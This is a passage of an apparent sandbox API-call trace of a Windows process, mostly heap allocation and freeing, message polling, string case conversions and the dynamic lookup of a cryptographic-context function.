hHeap=0x25c0000) returned 1 [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.590] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.590] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.590] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1878 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.590] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab340 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab340 [0206.591] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0206.591] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f00 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.592] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.593] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.593] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.594] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0206.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2466dd0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0206.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.595] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContext") returned 0x0 [0206.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0206.595] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x2466dd0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0206.595] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.596] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3cb8 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b36c0 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0206.596] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.596] CryptAcquireContextA (in: phProv=0x8befe0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8befe0*=0xad2940) returned 1 [0206.597] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d98 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0206.598] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1878 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1768 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0206.599] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0206.599] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.599] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.599] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.600] CharUpperBuffW (in: lpsz="A1300D00639", cchLength=0xb | out: lpsz="A1300D00639") returned 0xb [0206.600] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.600] CharUpperBuffW (in: lpsz="SSA1300D00639", cchLength=0xd | out: lpsz="SSA1300D00639") returned 0xd [0206.600] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.600] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.600] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab328 [0206.600] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.600] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.601] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.601] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0206.601] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0206.601] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.601] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0206.601] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.601] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0206.601] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0206.601] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.602] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17c8 [0206.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0206.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.602] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.602] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0206.602] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1768 [0206.602] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.602] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0206.603] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0206.604] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0206.604] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0206.604] RtlAllocateHeap 